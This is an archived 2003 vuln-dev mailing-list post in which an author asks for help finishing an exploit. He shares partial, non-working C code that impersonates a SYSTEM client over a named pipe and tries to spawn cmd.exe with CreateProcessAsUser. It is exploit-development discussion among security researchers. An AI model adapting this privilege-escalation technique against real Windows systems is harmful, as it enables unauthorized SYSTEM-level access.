Named Pipe Impersonation -> CreateProcessAsUser();

From: wirepair (wirepair_at_roguemail.net)
Date: 07/14/03

  • Next message: Blue Boar: "Re: Named Pipe Impersonation -> CreateProcessAsUser();"
    To: vuln-dev@securityfocus.com
    Date: Mon, 14 Jul 2003 12:45:37 -0700
    
    

    Hello, I'm attempting to finish up my exploit for the
    @stake advisory, i've hit quite a snag when i found out
    that calling a new process does not inherit the privileges
    of the named pipe. (I must have been thinking of fork() or
    something heh). So I can impersonate SYSTEM, but I can not
    create a new process with these nice privileges. Here is
    where i am at:
    ConnectNamedPipe() <-- yada yada wait for connection
       if (!ImpersonateNamedPipeClient (hPipe)) // impersonate
    the pipe so we now are SYSTEM.
       {
         printf ("Failed to impersonate the named pipe.\n");
         CloseHandle(hPipe);
         return 5;
       }
    // found this on msdn, i'm trying to get a token with full
    access, then call CreateProcessAsUser();
       if (!OpenThreadToken(GetCurrentThread(),
    TOKEN_ALL_ACCESS, TRUE, &hToken )) {
                 if (hToken != INVALID_HANDLE_VALUE) {
                  CloseHandle(hToken);
                             printf("damn: %u\n", GetLastError());
                     }
       }

      MapGenericMask( &dwAccessDesired, pGeneric ); //this i'm
    kinda shady on, looks like i'm just mapping the id to the
    SYSTEM name? when i call GetUserName i get garble after
    the OpenThreadToken unless i call MapGenericMask...

    CreateProcessAsUser(hToken, "cmd.exe",
    NULL,NULL,NULL,true,NULL,NULL,NULL,&si, &pi);
       CloseHandle(hPipe);

    now i call createprocessasuser, using the token from
    openthreadtoken. In the debugger, it tries to execute cmd,
    but but i get nothing back... if anyone wants to see my
    code it's at http://sh0dan.org/files/tac0tac0.c... Thanks
    this is starting to bug me :),
    -wire
    _____________________________
    For the best comics, toys, movies, and more,
    please visit <http://www.tfaw.com/?qt=wmf>


  • Next message: Blue Boar: "Re: Named Pipe Impersonation -> CreateProcessAsUser();"

    Relevant Pages

    • Re: CreateProcessAsUser error "the client does not have the required priviledges"
      ... I understand what you are saying about granting privileges ... on original user but I don't know how to do this. ... use LogonUser again to call CreateProcessAsUser? ...
      (microsoft.public.platformsdk.security)
    • Re: SE_ASSIGNPRIMARYTOKEN_NAME
      ... Please note following lines from CreateProcessAsUser remark section: ... the process that calls the CreateProcessAsUser function must have the SE_ASSIGNPRIMARYTOKEN_NAME and ... SE_INCREASE_QUOTA_NAME privileges. ...
      (microsoft.public.platformsdk.security)
    • Re: SHFileOperation Problem
      ... What I've been struggling with is on how to give the required privileges ... And the process that calls the CreateProcessAsUser() must have the ... LogonUserEx function) the required access rights (Query, ...
      (microsoft.public.platformsdk.security)
    • Re: Redirecting sdtin, stdout, stderr from an already running process
      ... The issue at hand is that we wish to start a process under another user's credentials with redirected I/O, without displaying a new window for that process. ... this is accomplished by calling Process.Startwith a ProcessStartInfo structure whose property "CreateNoWindow" is set to true and whose "Redirect*" properties are set to appropriate values. ... In order to use CreateProcessAsUser() successfully, the caller must hold the SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME privileges. ...
      (microsoft.public.dotnet.framework.interop)
    • CreateProcessAsUser (error 1314)
      ... I have a problem with CreateProcessAsUser. ... My application needs to change the privileges to administrator privileges of ... bUserAuth = false; ... ZeroMemory(&si, sizeof(si)); ...
      (microsoft.public.vc.language)